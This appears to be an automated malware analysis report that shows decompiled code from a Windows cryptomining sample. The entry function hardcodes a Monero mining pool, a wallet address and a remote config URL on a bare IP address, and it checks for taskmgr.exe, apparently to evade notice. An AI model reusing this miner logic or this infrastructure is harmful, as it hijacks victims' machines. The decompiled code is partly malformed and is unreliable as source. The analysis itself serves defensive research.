                                                                                                                                          			E004068E0(intOrPtr _a4) {
				char _v12;
				long _v16;
				void* _v20;
				long _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				char* _v44;
				long _v48;
				void* _v52;
				long _t25;

				_v52 = 0;
				asm("xorps xmm0, xmm0");
				_v32 = 0;
				asm("movups [ebp-0x2c], xmm0");
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				asm("movq [ebp-0x8], xmm0");
				 *0x5d10b8(_a4,  &_v12, 0, 0);
				_v52 = 0x18;
				_v44 =  &_v12;
				_v48 = 0;
				_v40 = 0x40;
				_v36 = 0;
				_v32 = 0;
				_t25 = NtCreateFile(0x5d2df8, 0x120089,  &_v52,  &_v28,  &_v20, 0x80, 0, 1, 0x60, 0, 0); // executed
				return _t25;
			}















                                                                                                                                          0x004068ed
                                                                                                                                          0x004068f8
                                                                                                                                          0x004068fb
                                                                                                                                          0x00406902
                                                                                                                                          0x00406906
                                                                                                                                          0x0040690d
                                                                                                                                          0x00406914
                                                                                                                                          0x0040691b
                                                                                                                                          0x00406922
                                                                                                                                          0x00406927
                                                                                                                                          0x0040693f
                                                                                                                                          0x00406946
                                                                                                                                          0x00406950
                                                                                                                                          0x0040695b
                                                                                                                                          0x0040696d
                                                                                                                                          0x00406974
                                                                                                                                          0x0040697b
                                                                                                                                          0x00406984

                                                                                                                                          APIs
                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(004068C5,004068C5,00000000,00000000), ref: 00406927
                                                                                                                                          • NtCreateFile.NTDLL(005D2DF8,00120089,00000018,00000000,00000000,00000080,00000000,00000001,00000060,00000000,00000000), ref: 0040697B
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Path$CreateFileNameName_
                                                                                                                                          • String ID: @
                                                                                                                                          • API String ID: 3479931691-2766056989
                                                                                                                                          • Opcode ID: 16fa837f9bc0ff09cc67a8f66bfc36083248c74de5f80e8970ab7ff66bd66588
                                                                                                                                          • Instruction ID: fb5b581ab8e3c93d90c851d27248355ddc5a87700a0b749ee16a3b9d52e94ed7
                                                                                                                                          • Opcode Fuzzy Hash: 16fa837f9bc0ff09cc67a8f66bfc36083248c74de5f80e8970ab7ff66bd66588
                                                                                                                                          • Instruction Fuzzy Hash: FC11DBB4D5031DABEB10DF90CD49BEEBBB8BB04704F10420AE9107A2C0D7B522888F99
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00403680, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                          			E00403680(signed int __edx, char _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				char* _v36;
				long _v40;
				void* _v44;
				long _t20;
				void* _t21;
				signed int _t23;

				_t23 = __edx;
				asm("xorps xmm0, xmm0");
				_v24 = 0;
				asm("movups [ebp-0x24], xmm0");
				_v20 = 0;
				_v36 =  &_a4;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0x40;
				_v28 = 0;
				_v24 = 0;
				_t20 = NtCreateFile(0x5d2df4, 0x120089,  &_v44,  &_v20,  &_v12, 0x80, 0, 1, 0x60, 0, 0);
				_t21 =  *0x5d2df4; // 0x3bc
				_t22 =  !=  ? _t23 | 0xffffffff : _t21;
				 *0x5d2df4 =  !=  ? _t23 | 0xffffffff : _t21;
				return _t20;
			}
















                                                                                                                                          0x00403680
                                                                                                                                          0x00403690
                                                                                                                                          0x00403693
                                                                                                                                          0x0040369a
                                                                                                                                          0x004036a6
                                                                                                                                          0x004036ad
                                                                                                                                          0x004036b7
                                                                                                                                          0x004036c2
                                                                                                                                          0x004036d4
                                                                                                                                          0x004036db
                                                                                                                                          0x004036e2
                                                                                                                                          0x004036e9
                                                                                                                                          0x004036f0
                                                                                                                                          0x004036f7
                                                                                                                                          0x004036fe
                                                                                                                                          0x00403704
                                                                                                                                          0x0040370f
                                                                                                                                          0x00403712
                                                                                                                                          0x0040371b

                                                                                                                                          APIs
                                                                                                                                          • NtCreateFile.NTDLL(005D2DF4,00120089,?,00000000,?,00000080,00000000,00000001,00000060,00000000,00000000), ref: 004036FE
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateFile
                                                                                                                                          • String ID: @
                                                                                                                                          • API String ID: 823142352-2766056989
                                                                                                                                          • Opcode ID: 0251f1d50f9b636af99753684b82d5b31b70b56ad5df258657e6c05342283ce3
                                                                                                                                          • Instruction ID: 3021d29c1a01cdcb7ce1e86a2c6713ee4fd4a7efed1c7ac6ce7211f4987aa3f7
                                                                                                                                          • Opcode Fuzzy Hash: 0251f1d50f9b636af99753684b82d5b31b70b56ad5df258657e6c05342283ce3
                                                                                                                                          • Instruction Fuzzy Hash: B2015EB0D4130CABEB14DF90CD49BDEBBF9BF18304F10420AE505762C0D7B516488B98
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00404470, Relevance: 86.2, APIs: 29, Strings: 20, Instructions: 457synchronizationCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                          			_entry_() {
				struct _SECURITY_ATTRIBUTES* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				intOrPtr _v16;
				char _v20;
				int _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				long _v32;
				long _v36;
				char _v38;
				short _v40;
				char _v48;
				char _v72;
				char _v592;
				char _v1112;
				char _v2136;
				char _v3160;
				void _v7224;
				long _t56;
				signed int _t61;
				void* _t65;
				long _t66;
				void* _t72;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				int _t80;
				void* _t82;
				void* _t84;
				void* _t89;
				void* _t90;
				void* _t91;
				intOrPtr _t93;
				void* _t94;
				long _t96;
				long _t99;
				void* _t102;
				char _t110;
				char _t114;
				char _t117;
				char _t119;
				short _t120;
				void* _t125;
				void* _t137;
				void* _t139;
				void* _t140;
				void* _t145;
				signed int _t148;
				char _t150;
				void* _t153;
				void* _t158;
				intOrPtr _t160;
				struct _SECURITY_ATTRIBUTES* _t161;
				void* _t166;
				struct _SECURITY_ATTRIBUTES* _t168;
				intOrPtr _t169;
				void* _t171;
				void* _t174;
				void* _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t196;
				void* _t223;
				void* _t224;
				void* _t225;
				void* _t226;
				void* _t234;

				_v8 = 0;
				_v12 = 0;
				_v28 = 0;
				_t56 = GetTickCount();
				_t150 = 0;
				_v32 = _t56;
				_v36 = _t56;
				_v24 = 0;
				 *0x5d2df4 = 0;
				E00401670("xmr-us-east1.nanopool.org:14444", 0, 0xcc8);
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x10], xmm0");
				E00401BB0( &_v7224, 0, 0xfe0);
				memcpy("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos",  &_v7224, 0x3f8 << 2);
				_t152 = 0;
				_t61 = SetErrorMode(2); // executed
				SetErrorMode(_t61 | 0x00000002); // executed
				E004017E0("e9c1286a28d82a2d0ee6", "e9c1286a28d82a2d0ee6");
				_t174 = _t171 + 0x2c;
				_t65 = CreateMutexA(0, 0, "e9c1286a28d82a2d0ee6"); // executed
				if(_t65 == 0) {
					ExitProcess(0x1e);
				}
				_t158 = GetLastError;
				_t66 = GetLastError();
				_t191 = _t66 - 0xb7;
				if(_t66 == 0xb7) {
					ExitProcess(0x1f);
				}
				E00403220(0, SetErrorMode, _t191);
				_t166 = CommandLineToArgvW(GetCommandLineW(),  &_v24);
				if(_t166 != 0 && _v24 > 1) {
					_t148 = E004019C0( *((intOrPtr*)(_t166 + 4)), L"--show-window");
					_t174 = _t174 + 8;
					asm("sbb eax, eax");
					 *0x5d1bb8 =  *0x5d1bb8 &  ~_t148;
				}
				LocalFree(_t166);
				_t72 = E00401000(_t152, _t158, _t166,  *0x5d1314); // executed
				_t175 = _t174 + 4;
				_t195 = _t72;
				if(_t72 != 0) {
					E00408070(_t152, _t195, "d06ed635-68f6-4e9a-955c-4899f5f57b9a"); // executed
					_t176 = _t175 + 4;
					_t196 =  *0x5d1bc0 - _t150; // 0x0
					if(_t196 != 0) {
						E004017E0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
						_t176 = _t176 + 8;
					}
					_t74 = E00401600("LKBNMTFJgl", "LKBNMTFJgl");
					_t177 = _t176 + 8;
					if(_t74 != 0) {
						_t75 = E00401600("csrss.exe", "csrss.exe");
						_t178 = _t177 + 8;
						if(_t75 != 0) {
							_t76 = E00401600("viTRMUuKeV", "viTRMUuKeV");
							_t179 = _t178 + 8;
							if(_t76 != 0) {
								_t77 = E00407FA0(_t152, "C:\ProgramData\LKBNMTFJgl", 0x40aae0, 0x23); // executed
								_t180 = _t179 + 0xc;
								if(_t77 != 0) {
									E00401970("C:\ProgramData\LKBNMTFJgl", "\\");
									E00401970("C:\ProgramData\LKBNMTFJgl", "LKBNMTFJgl");
									_t181 = _t180 + 0x10;
									_t80 = CreateDirectoryW("C:\ProgramData\LKBNMTFJgl", 0); // executed
									if(_t80 != 0 || GetLastError() == 0xb7) {
										if(E00408DD0() != 0 &&  *0x5d210c == 1) {
											_t145 = CreateThread(0, 0, E00408450, 0, 0, 0); // executed
											 *0x5d211c = _t145;
										}
										_t82 = E004017B0("FALSE", "http://45.144.225.135/config.txt");
										_t182 = _t181 + 8;
										if(_t82 == 0) {
											L33:
											_t84 = E00403150( &_v1112); // executed
											_t183 = _t182 + 4;
											if(_t84 != 0) {
												E004030B0( &_v1112,  &_v2136,  &_v3160);
												__imp__SetThreadExecutionState(0x80000041, 0);
												_t89 = E00403CA0(_t152, _t153, 1, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c); // executed
												_t185 = _t183 + 0x24;
												if(_t89 == 0) {
													L91:
													ExitProcess(0x3d);
												}
												_t90 = E00403CA0(_t152, _t153, 0, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c); // executed
												_t186 = _t185 + 0x14;
												if(_t90 == 0) {
													goto L91;
												}
												L38:
												while(1) {
													if( *0x5d1300 != 0) {
														_t169 = _v28;
														if(_t169 == 0) {
															_t96 = GetTickCount();
															_t215 = _t96 - _v36 - 0x4e20;
															if(_t96 - _v36 > 0x4e20) {
																E004065D0(_t215); // executed
																_t170 =  !=  ? 1 : _t169;
																_v28 =  !=  ? 1 : _t169;
															}
														}
													}
													if( *0x5d1308 == 3) {
														_t160 =  *0x5d1310; // 0x7530
														_t161 = _t160 + 1;
														__eflags = _t161;
													} else {
														_t161 = E00408040();
													}
													_t91 = E00408A50(_t150); // executed
													_t187 = _t186 + 4;
													_t168 =  ==  ? 1 : _t91;
													if( *0x5d1304 == 0) {
														_t93 = _v12;
													} else {
														_t93 = E00407EF0("taskmgr.exe"); // executed
														_t187 = _t187 + 4;
														_v12 = _t93;
													}
													if(_t150 == 0 || _t168 == 0) {
														if(_t93 != 0) {
															goto L58;
														}
														_t223 =  *0x5d1320 - _t93; // 0x0
														if(_t223 != 0) {
															goto L58;
														}
														_t224 =  *0x5d2110 - _t93; // 0x0
														if(_t224 != 0) {
															goto L58;
														}
														_t225 = _t161 -  *0x5d1310; // 0x7530
														if(_t225 <= 0) {
															__eflags =  *0x5d1308;
															if( *0x5d1308 != 0) {
																_t117 = E00403050(_t150, _t152,  &_v2136, 0); // executed
																_t187 = _t187 + 8;
																_t150 = _t117;
																_t168 = 1;
															}
															_v8 = 0;
															goto L68;
														}
														_t119 = E00403050(_t150, _t152,  &_v3160, _t93);
														_t187 = _t187 + 8;
														_v8 = 1;
														_t150 = _t119;
														_t168 = 1;
														goto L59;
													} else {
														L58:
														__eflags = _v8;
														if(_v8 == 0) {
															L68:
															_t234 = _t161 -  *0x5d1310; // 0x7530
															if(_t234 <= 0) {
																L75:
																__eflags = _v12;
																if(_v12 == 0) {
																	L77:
																	if( *0x5d1320 == 0) {
																		L79:
																		if( *0x5d2110 == 0) {
																			L82:
																			_t94 = E004017B0("FALSE", "http://45.144.225.135/config.txt");
																			_t186 = _t187 + 8;
																			if(_t94 != 0) {
																				_t99 = GetTickCount();
																				_t152 =  *0x5d1bb4 * 0xea60;
																				_t245 = _t99 - _v32 -  *0x5d1bb4 * 0xea60;
																				if(_t99 - _v32 >  *0x5d1bb4 * 0xea60) {
																					_v32 = GetTickCount();
																					_t102 = E00404DE0(_t152, _t153, _t245, "http://45.144.225.135/config.txt", "FALSE", "xmr-us-east1.nanopool.org:14444", _t150, _t168);
																					_t186 = _t186 + 0x14;
																					if(_t102 != 0) {
																						if(E004039B0(_t153) != 0) {
																							if(_t168 != 0) {
																								E00408730(_t150);
																								_t186 = _t186 + 4;
																							}
																							E00403CA0(_t152, _t153, 1, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c);
																							E00403CA0(_t152, _t153, 0, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c);
																							_t186 = _t186 + 0x28;
																						}
																						E00403B50(_t153, _v20, _v16);
																						_t186 = _t186 + 8;
																					}
																				}
																			}
																			Sleep(0xfa0); // executed
																			continue;
																		}
																		L80:
																		if(_t168 == 0) {
																			goto L82;
																		}
																		L81:
																		E00408730(_t150);
																		_t187 = _t187 + 4;
																		_t168 = 0;
																		goto L82;
																	}
																	L78:
																	if(_t168 != 0) {
																		goto L81;
																	}
																	goto L79;
																}
																L76:
																__eflags = _t168;
																if(_t168 != 0) {
																	goto L81;
																}
																goto L77;
															}
															if(_v12 != 0) {
																goto L76;
															}
															if( *0x5d1320 != 0) {
																goto L78;
															}
															if( *0x5d2110 != 0) {
																goto L80;
															}
															if(_t168 != 0) {
																E00408730(_t150);
																_t187 = _t187 + 4;
															}
															_t110 = E00403050(_t150, _t152,  &_v3160, 0);
															_t187 = _t187 + 8;
															_v8 = 1;
															_t150 = _t110;
															_t168 = 1;
															goto L77;
														}
														L59:
														_t226 = _t161 -  *0x5d1310; // 0x7530
														if(_t226 > 0) {
															goto L75;
														}
														if(_v12 != 0) {
															goto L76;
														}
														if( *0x5d1320 != 0) {
															goto L78;
														}
														if( *0x5d2110 != 0) {
															goto L80;
														}
														if(_t168 != 0) {
															E00408730(_t150);
															_t187 = _t187 + 4;
															_t168 = 0;
														}
														if( *0x5d1308 != 0) {
															_t114 = E00403050(_t150, _t152,  &_v2136, 0);
															_t187 = _t187 + 8;
															_t150 = _t114;
															_t168 = 1;
														}
														_v8 = 0;
														goto L68;
													}
												}
											}
											ExitProcess(0x1c);
										} else {
											_t120 =  *0x5d2074; // 0x3832
											asm("movq xmm0, [0x5d206c]");
											_v40 = _t120;
											asm("movq [ebp-0x2c], xmm0");
											_v38 = _t150;
											E00401A00( &_v592, "C:\ProgramData\LKBNMTFJgl");
											_t125 = E00401600( &_v72,  &_v48);
											_t183 = _t182 + 0x10;
											if(_t125 == 0) {
												ExitProcess(0x2f);
											}
											E00401970( &_v592, "\\");
											E00401970( &_v592,  &_v72);
											E00401970( &_v592, "_");
											E00401970( &_v592, L"3.1.0");
											_t188 = _t183 + 0x20;
											_t137 =  *0x5d10b8( &_v592,  &_v20, 0, 0);
											_t207 = _t137 - 1;
											if(_t137 == 1) {
												_t139 = E004037E0(_t207,  &_v592); // executed
												_t189 = _t188 + 4;
												_t208 = _t139;
												if(_t139 != 0) {
													E004039B0(_t153);
													_push(_v16);
													E00403680(_t153, _v20);
													_t189 = _t189 + 8;
												}
												_t140 = E00404DE0(_t152, _t153, _t208, "http://45.144.225.135/config.txt", "FALSE", "xmr-us-east1.nanopool.org:14444", 0, 0); // executed
												_t182 = _t189 + 0x14;
												if(_t140 != 0) {
													E004039B0(_t153);
													E00403B50(_t153, _v20, _v16); // executed
													_t182 = _t182 + 8;
												}
												goto L33;
											}
											ExitProcess(0x3c);
										}
									} else {
										ExitProcess(0x32);
									}
								}
								ExitProcess(0x31);
							}
							ExitProcess(0x30);
						}
						ExitProcess(0x30);
					} else {
						ExitProcess(0x30);
					}
				}
				ExitProcess(0x3b);
			}

















































































                                                                                                                                          0x0040447e
                                                                                                                                          0x00404481
                                                                                                                                          0x00404484
                                                                                                                                          0x00404487
                                                                                                                                          0x0040448d
                                                                                                                                          0x0040448f
                                                                                                                                          0x0040449d
                                                                                                                                          0x004044a0
                                                                                                                                          0x004044a3
                                                                                                                                          0x004044a9
                                                                                                                                          0x004044b9
                                                                                                                                          0x004044be
                                                                                                                                          0x004044c3
                                                                                                                                          0x004044db
                                                                                                                                          0x004044db
                                                                                                                                          0x004044e5
                                                                                                                                          0x004044eb
                                                                                                                                          0x004044f7
                                                                                                                                          0x004044fc
                                                                                                                                          0x00404506
                                                                                                                                          0x0040450e
                                                                                                                                          0x00404512
                                                                                                                                          0x00404512
                                                                                                                                          0x00404518
                                                                                                                                          0x0040451e
                                                                                                                                          0x00404520
                                                                                                                                          0x00404525
                                                                                                                                          0x00404529
                                                                                                                                          0x00404529
                                                                                                                                          0x0040452f
                                                                                                                                          0x00404545
                                                                                                                                          0x00404549
                                                                                                                                          0x00404559
                                                                                                                                          0x0040455e
                                                                                                                                          0x00404563
                                                                                                                                          0x00404565
                                                                                                                                          0x00404565
                                                                                                                                          0x0040456c
                                                                                                                                          0x00404578
                                                                                                                                          0x0040457d
                                                                                                                                          0x00404580
                                                                                                                                          0x00404582
                                                                                                                                          0x00404591
                                                                                                                                          0x00404596
                                                                                                                                          0x00404599
                                                                                                                                          0x0040459f
                                                                                                                                          0x004045ab
                                                                                                                                          0x004045b0
                                                                                                                                          0x004045b0
                                                                                                                                          0x004045bd
                                                                                                                                          0x004045c2
                                                                                                                                          0x004045c7
                                                                                                                                          0x004045db
                                                                                                                                          0x004045e0
                                                                                                                                          0x004045e5
                                                                                                                                          0x004045f9
                                                                                                                                          0x004045fe
                                                                                                                                          0x00404603
                                                                                                                                          0x00404619
                                                                                                                                          0x0040461e
                                                                                                                                          0x00404623
                                                                                                                                          0x00404637
                                                                                                                                          0x00404646
                                                                                                                                          0x0040464b
                                                                                                                                          0x00404655
                                                                                                                                          0x0040465d
                                                                                                                                          0x00404677
                                                                                                                                          0x00404691
                                                                                                                                          0x00404697
                                                                                                                                          0x00404697
                                                                                                                                          0x004046a6
                                                                                                                                          0x004046ab
                                                                                                                                          0x004046b0
                                                                                                                                          0x004047b8
                                                                                                                                          0x004047bf
                                                                                                                                          0x004047c4
                                                                                                                                          0x004047c9
                                                                                                                                          0x004047f2
                                                                                                                                          0x004047ff
                                                                                                                                          0x0040481c
                                                                                                                                          0x00404821
                                                                                                                                          0x00404826
                                                                                                                                          0x00404af0
                                                                                                                                          0x00404af2
                                                                                                                                          0x00404af2
                                                                                                                                          0x00404843
                                                                                                                                          0x00404848
                                                                                                                                          0x0040484d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00404853
                                                                                                                                          0x0040485f
                                                                                                                                          0x00404861
                                                                                                                                          0x00404866
                                                                                                                                          0x00404868
                                                                                                                                          0x00404871
                                                                                                                                          0x00404876
                                                                                                                                          0x00404878
                                                                                                                                          0x0040487f
                                                                                                                                          0x00404882
                                                                                                                                          0x00404882
                                                                                                                                          0x00404876
                                                                                                                                          0x00404866
                                                                                                                                          0x0040488c
                                                                                                                                          0x00404897
                                                                                                                                          0x0040489d
                                                                                                                                          0x0040489d
                                                                                                                                          0x0040488e
                                                                                                                                          0x00404893
                                                                                                                                          0x00404893
                                                                                                                                          0x0040489f
                                                                                                                                          0x004048a6
                                                                                                                                          0x004048b1
                                                                                                                                          0x004048bb
                                                                                                                                          0x004048cf
                                                                                                                                          0x004048bd
                                                                                                                                          0x004048c2
                                                                                                                                          0x004048c7
                                                                                                                                          0x004048ca
                                                                                                                                          0x004048ca
                                                                                                                                          0x004048d4
                                                                                                                                          0x004048dc
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x004048de
                                                                                                                                          0x004048e4
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x004048e6
                                                                                                                                          0x004048ec
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x004048ee
                                                                                                                                          0x004048f4
                                                                                                                                          0x00404916
                                                                                                                                          0x0040491d
                                                                                                                                          0x00404928
                                                                                                                                          0x0040492d
                                                                                                                                          0x00404930
                                                                                                                                          0x00404932
                                                                                                                                          0x00404932
                                                                                                                                          0x00404937
                                                                                                                                          0x00000000
                                                                                                                                          0x00404937
                                                                                                                                          0x004048fe
                                                                                                                                          0x00404903
                                                                                                                                          0x00404906
                                                                                                                                          0x0040490d
                                                                                                                                          0x0040490f
                                                                                                                                          0x00000000
                                                                                                                                          0x00404940
                                                                                                                                          0x00404940
                                                                                                                                          0x00404940
                                                                                                                                          0x00404944
                                                                                                                                          0x004049ab
                                                                                                                                          0x004049ab
                                                                                                                                          0x004049b1
                                                                                                                                          0x004049f9
                                                                                                                                          0x004049f9
                                                                                                                                          0x004049fd
                                                                                                                                          0x00404a03
                                                                                                                                          0x00404a0a
                                                                                                                                          0x00404a10
                                                                                                                                          0x00404a17
                                                                                                                                          0x00404a28
                                                                                                                                          0x00404a32
                                                                                                                                          0x00404a37
                                                                                                                                          0x00404a3c
                                                                                                                                          0x00404a48
                                                                                                                                          0x00404a4a
                                                                                                                                          0x00404a57
                                                                                                                                          0x00404a59
                                                                                                                                          0x00404a72
                                                                                                                                          0x00404a75
                                                                                                                                          0x00404a7a
                                                                                                                                          0x00404a7f
                                                                                                                                          0x00404a88
                                                                                                                                          0x00404a8c
                                                                                                                                          0x00404a8f
                                                                                                                                          0x00404a94
                                                                                                                                          0x00404a94
                                                                                                                                          0x00404aae
                                                                                                                                          0x00404aca
                                                                                                                                          0x00404acf
                                                                                                                                          0x00404acf
                                                                                                                                          0x00404ad8
                                                                                                                                          0x00404add
                                                                                                                                          0x00404add
                                                                                                                                          0x00404a7f
                                                                                                                                          0x00404a59
                                                                                                                                          0x00404ae5
                                                                                                                                          0x00000000
                                                                                                                                          0x00404ae5
                                                                                                                                          0x00404a19
                                                                                                                                          0x00404a1b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00404a1d
                                                                                                                                          0x00404a1e
                                                                                                                                          0x00404a23
                                                                                                                                          0x00404a26
                                                                                                                                          0x00000000
                                                                                                                                          0x00404a26
                                                                                                                                          0x00404a0c
                                                                                                                                          0x00404a0e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00404a0e
                                                                                                                                          0x004049ff
                                                                                                                                          0x004049ff
                                                                                                                                          0x00404a01
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00404a01
                                                                                                                                          0x004049b7
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x004049c0
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x004049c9
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x004049cd
                                                                                                                                          0x004049d0
                                                                                                                                          0x004049d5
                                                                                                                                          0x004049d5
                                                                                                                                          0x004049e1
                                                                                                                                          0x004049e6
                                                                                                                                          0x004049e9
                                                                                                                                          0x004049f0
                                                                                                                                          0x004049f2
                                                                                                                                          0x00000000
                                                                                                                                          0x004049f2
                                                                                                                                          0x00404946
                                                                                                                                          0x00404946
                                                                                                                                          0x0040494c
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00404956
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00404963
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00404970
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00404978
                                                                                                                                          0x0040497b
                                                                                                                                          0x00404980
                                                                                                                                          0x00404983
                                                                                                                                          0x00404983
                                                                                                                                          0x0040498c
                                                                                                                                          0x00404997
                                                                                                                                          0x0040499c
                                                                                                                                          0x0040499f
                                                                                                                                          0x004049a1
                                                                                                                                          0x004049a1
                                                                                                                                          0x004049a8
                                                                                                                                          0x00000000
                                                                                                                                          0x004049a8
                                                                                                                                          0x004048d4
                                                                                                                                          0x00404853
                                                                                                                                          0x004047cd
                                                                                                                                          0x004046b6
                                                                                                                                          0x004046b6
                                                                                                                                          0x004046bc
                                                                                                                                          0x004046c4
                                                                                                                                          0x004046d4
                                                                                                                                          0x004046d9
                                                                                                                                          0x004046dc
                                                                                                                                          0x004046e9
                                                                                                                                          0x004046ee
                                                                                                                                          0x004046f3
                                                                                                                                          0x004047d5
                                                                                                                                          0x004047d5
                                                                                                                                          0x00404705
                                                                                                                                          0x00404715
                                                                                                                                          0x00404726
                                                                                                                                          0x00404737
                                                                                                                                          0x0040473c
                                                                                                                                          0x0040474e
                                                                                                                                          0x00404754
                                                                                                                                          0x00404756
                                                                                                                                          0x00404767
                                                                                                                                          0x0040476c
                                                                                                                                          0x0040476f
                                                                                                                                          0x00404771
                                                                                                                                          0x00404773
                                                                                                                                          0x00404778
                                                                                                                                          0x0040477e
                                                                                                                                          0x00404783
                                                                                                                                          0x00404783
                                                                                                                                          0x00404799
                                                                                                                                          0x0040479e
                                                                                                                                          0x004047a3
                                                                                                                                          0x004047a5
                                                                                                                                          0x004047b0
                                                                                                                                          0x004047b5
                                                                                                                                          0x004047b5
                                                                                                                                          0x00000000
                                                                                                                                          0x004047a3
                                                                                                                                          0x0040475a
                                                                                                                                          0x0040475a
                                                                                                                                          0x00404668
                                                                                                                                          0x0040466a
                                                                                                                                          0x0040466a
                                                                                                                                          0x0040465d
                                                                                                                                          0x00404627
                                                                                                                                          0x00404627
                                                                                                                                          0x00404607
                                                                                                                                          0x00404607
                                                                                                                                          0x004045e9
                                                                                                                                          0x004045c9
                                                                                                                                          0x004045cb
                                                                                                                                          0x004045cb
                                                                                                                                          0x004045c7
                                                                                                                                          0x00404586

                                                                                                                                          APIs
                                                                                                                                          • GetTickCount.KERNEL32 ref: 00404487
                                                                                                                                          • SetErrorMode.KERNELBASE(00000002), ref: 004044E5
                                                                                                                                          • SetErrorMode.KERNELBASE(00000000), ref: 004044EB
                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,e9c1286a28d82a2d0ee6), ref: 00404506
                                                                                                                                          • ExitProcess.KERNEL32 ref: 00404512
                                                                                                                                          • GetLastError.KERNEL32 ref: 0040451E
                                                                                                                                          • ExitProcess.KERNEL32 ref: 00404529
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Error$ExitModeProcess$CountCreateLastMutexTick
                                                                                                                                          • String ID: --show-window$3.1.0$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos$C:\ProgramData\LKBNMTFJgl$FALSE$FALSE$FALSE$LKBNMTFJgl$LKBNMTFJgl$csrss.exe$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$e9c1286a28d82a2d0ee6$e9c1286a28d82a2d0ee6$http://45.144.225.135/config.txt$taskmgr.exe$viTRMUuKeV$viTRMUuKeV$xmr-us-east1.nanopool.org:14444$xmr-us-east1.nanopool.org:14444
                                                                                                                                          • API String ID: 3615071802-544947428
                                                                                                                                          • Opcode ID: e7c3370e5e554634d6f38dec234f5c2f7b09adaa70533622726b45a566a1b702
                                                                                                                                          • Instruction ID: deaf04295798d6261b51ffebf117c96f993ab97e4c983c13017be75728aacaa1
